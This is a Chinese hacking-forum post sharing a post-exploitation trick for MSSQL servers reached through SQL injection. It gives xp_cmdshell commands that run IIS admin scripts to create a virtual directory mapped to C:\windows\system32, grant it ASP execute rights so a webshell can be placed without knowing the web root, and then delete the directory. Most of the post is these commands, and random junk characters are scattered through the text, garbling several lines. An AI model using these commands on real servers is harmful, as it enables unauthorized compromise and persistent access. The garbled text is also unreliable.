- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
# g5 m8 U: Y/ l+ K
) s" Q, O1 R+ W) T7 s4 W+ Nexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"': r: I; s Y" |7 V; {% `8 u& x
建立虚拟目录win,指向c:\windows\system321 K% P! G9 e, l. P, }
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture', ^: j8 R+ ~% c# c4 G
让win句有解析asp脚本权限
. n5 z- d9 b, u9 C: D
8 b1 O# g# ~8 V" O3 S0 M+ b0 p4 A6 f Qexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
* ~+ ^4 _" p& E& L. Q, }删除虚拟目录。
2 H; g: D" l6 U7 D0 q找不到web绝对路径的一种解决办法,% x& [5 P2 c& y! ]& @: r4 H
$ x. A5 @ g7 o3 S5 S
403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|